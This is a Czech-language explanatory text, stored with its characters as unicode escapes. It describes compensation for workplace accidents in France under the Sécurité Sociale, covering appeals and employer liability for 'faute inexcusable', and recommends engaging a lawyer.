Francouzsk\u00fd syst\u00e9m soci\u00e1ln\u00edho zabezpe\u010den\u00ed (S\u00e9curit\u00e9 Sociale) je z\u00e1kladn\u00edm pil\u00ed\u0159em, na kter\u00e9m stoj\u00ed ve\u0161ker\u00e9 od\u0161kodn\u011bn\u00ed za pracovn\u00ed \u00faraz ve Francii (accident du travail). Pokud je pracovn\u00ed \u00faraz uzn\u00e1n, po\u0161kozen\u00fd m\u00e1 n\u00e1rok na \u0159adu n\u00e1hrad, mezi kter\u00e9 pat\u0159\u00ed n\u00e1hrada u\u0161l\u00e9 mzdy v dob\u011b pracovn\u00ed neschopnosti (tzv. indemnit\u00e9s journali\u00e8res), \u00fahrada ve\u0161ker\u00fdch l\u00e9\u010debn\u00fdch v\u00fdloh (frais m\u00e9dicaux) a pokud dojde k trval\u00e9mu po\u0161kozen\u00ed zdrav\u00ed, m\u016f\u017ee b\u00fdt po\u0161kozen\u00e9mu p\u0159izn\u00e1na do\u017eivotn\u00ed renta (rente d\u2019incapacit\u00e9).  Komplikace nast\u00e1vaj\u00ed v okam\u017eiku, kdy po\u0161kozen\u00fd nen\u00ed spokojen s navrhovanou v\u00fd\u0161\u00ed od\u0161kodn\u011bn\u00ed, nebo mu byla n\u00e1hrada zcela zam\u00edtnuta. V takov\u00fdch p\u0159\u00edpadech je mo\u017en\u00e9 se odvolat, po\u017eadovat p\u0159ehodnocen\u00ed nebo vy\u0161\u0161\u00ed finan\u010dn\u00ed n\u00e1hradu. Tento proces m\u016f\u017ee zahrnovat i soudn\u00ed \u0159\u00edzen\u00ed, kter\u00e9 je \u010dasto n\u00e1ro\u010dn\u00e9 na p\u0159\u00edpravu a vy\u017eaduje detailn\u00ed znalost pr\u00e1vn\u00edch p\u0159edpis\u016f. Krom\u011b standardn\u00edch n\u00e1hrad existuje mo\u017enost, \u017ee soud p\u0159izn\u00e1 dodate\u010dn\u00e9 od\u0161kodn\u011bn\u00ed, pokud je zji\u0161t\u011bno, \u017ee pracovn\u00ed \u00faraz byl zavin\u011bn \u201eneomluvitelnou chybou\u201c zam\u011bstnavatele (faute inexcusable de l&#8217;employeur). To se vztahuje na situace, kdy zam\u011bstnavatel v\u011bd\u011bl nebo m\u011bl v\u011bd\u011bt o nebezpe\u010d\u00ed a nepodnikl \u017e\u00e1dn\u00e1 opat\u0159en\u00ed k jeho odstran\u011bn\u00ed. V takov\u00e9m p\u0159\u00edpad\u011b se jedn\u00e1 o velmi specifick\u00fd a slo\u017eit\u00fd pr\u00e1vn\u00ed proces, kter\u00fd se t\u00e9m\u011b\u0159 neobejde bez pomoci zku\u0161en\u00e9ho advok\u00e1ta.  Z\u00edskat od\u0161kodn\u011bn\u00ed po pracovn\u00edm \u00farazu ve Francii bez pomoci odborn\u00edk\u016f je velmi riskantn\u00ed a m\u016f\u017ee v\u00e9st k v\u00fdznamn\u00fdm finan\u010dn\u00edm ztr\u00e1t\u00e1m. Spr\u00e1vn\u00e9 posouzen\u00ed v\u0161ech aspekt\u016f, od pod\u00e1n\u00ed \u017e\u00e1dosti a\u017e po p\u0159\u00edpadn\u00e9 soudn\u00ed spory, je kl\u00ed\u010dov\u00e9. Spr\u00e1vn\u00e9 a v\u010dasn\u00e9 jedn\u00e1n\u00ed je kl\u00ed\u010dov\u00e9.
